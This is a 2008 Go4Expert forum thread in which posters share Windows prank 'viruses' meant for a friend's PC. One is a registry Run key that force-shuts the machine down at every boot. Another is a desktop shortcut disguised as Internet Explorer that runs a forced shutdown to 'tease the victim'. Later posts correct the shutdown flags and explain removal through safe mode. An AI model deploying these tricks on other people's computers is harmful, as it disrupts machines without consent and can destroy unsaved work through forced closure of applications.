Go4Expert

Go4Expert (http://www.go4expert.com/)
-   Windows (http://www.go4expert.com/articles/windows/)
-   -   Shutdown PC when every time its starts (http://www.go4expert.com/articles/shutdown-pc-time-starts-t15564/)

NDL 21Dec2008 13:05

Shutdown PC when every time its starts

Disclaimer : This is for education purpose only if something like this happens to you.

How to do it

Shutdown your friend's pc when every time its restarts. Add the following registry key and that should do the job for you.

Code:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"VIRUS"="%windir%\\SYSTEM32\\SHUTDOWN.EXE -t 1 -c \"Howz this new Virus ha..??\" -f"

DONT PUT IT IN UR COMPUTER, I AM NOT RESPONSIBLE, if it happens, to you, start windows in safe mode, and open registry editor by typiing REGEDIT in start->run. navigate to
Code:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
and remove the string value named VIRUS, restart you computer.

neo_vi 21Dec2008 17:51

Re: Shutdown PC when every time its starts

can't we remove that from startup. Will it give time to establish the explorer or it'll shutdown instantly. Wat happens is safe mode?

Bhullarz 21Dec2008 20:43

Nice Trick NDL ! I used the same thing but in different manner a long time ago.
Let me just share it with you all.

Just right click on desktop. Select "new" from menu and then select "shortcut". Now instead of browsing the file, just type the following code :
Code:

shutdown -t 1 -f
Now click on "next" and then name the file as "Internet Explorer" or whatever you want. And then click on "Finish". A new shortcut is created on the desktop. Now right click on the shortcut and select "properties" from the menu. You will find a button "Change icon". Now click on it and choose the icon whichever you want. If you have named the icon as "Internet Explorer" , just choose the icon of Internet Explorer. Now its ready to work. Whenever Anyone would try to start the Internet Explorer using this icon , the pc will be shutdown or will logoff ( in case of if you are using good anti virus). Before logging off / Shutdown, it will close all the opened applications.
I have tested this trick with only Windows XP SP2 only. It won't harm your pc anyway but can tease the victim.

For neo_vi, whenever you are starting up in safe mode, system will load only the basic drivers required to work the system properly. No other user-defined start ups or application controlled start ups will be loaded. So, you can start your system in safe mode and can remove the registry entry.

NDL 22Dec2008 12:15

Quote:

Originally Posted by neo_vi (Post 40492)
can't we remove that from startup. Will it give time to establish the explorer or it'll shutdown instantly. Wat happens is safe mode?

when u start with safe mode it only load basics

NDL 22Dec2008 12:17

Quote:

Originally Posted by Bhullarz (Post 40494)
Nice Trick NDL ! I used the same thing but in different manner a long time ago.
Let me just share it with you all.

Just right click on desktop. Select "new" from menu and then select "shortcut". Now instead of browsing the file, just type the following code :
Code:

shutdown -t 1 -f
Now click on "next" and then name the file as "Internet Explorer" or whatever you want. And then click on "Finish". A new shortcut is created on the desktop. Now right click on the shortcut and select "properties" from the menu. You will find a button "Change icon". Now click on it and choose the icon whichever you want. If you have named the icon as "Internet Explorer" , just choose the icon of Internet Explorer. Now its ready to work. Whenever Anyone would try to start the Internet Explorer using this icon , the pc will be shutdown or will logoff ( in case of if you are using good anti virus). Before logging off / Shutdown, it will close all the opened applications.
I have tested this trick with only Windows XP SP2 only. It won't harm your pc anyway but can tease the victim.

For neo_vi, whenever you are starting up in safe mode, system will load only the basic drivers required to work the system properly. No other user-defined start ups or application controlled start ups will be loaded. So, you can start your system in safe mode and can remove the registry entry.

nice one :D

happyz 22Dec2008 16:07

this isn't working as it is posted..... it is logging off the system rather than shutting down
I just tried it now

neo_vi 22Dec2008 19:18

ya. i too tried. it only logs off the system.
try this
Code:

shutdown -s
or
shutdown -r

It will work fine.

happyz 23Dec2008 16:36

Quote:

Originally Posted by neo_vi (Post 40519)
ya. i too tried. it only logs off the system.
try this
Code:

shutdown -s
or
shutdown -r

It will work fine.

yes this will work now

shutdown -s will only shutdown now and shutdown -r will restart

happyz 23Dec2008 16:38

and one more thing i think you should also edit your post now either edit the quoted code or the title of the post

NDL 24Dec2008 16:00

Quote:

Originally Posted by happyz (Post 40535)
and one more thing i think you should also edit your post now either edit the quoted code or the title of the post

i dont have a edit option :(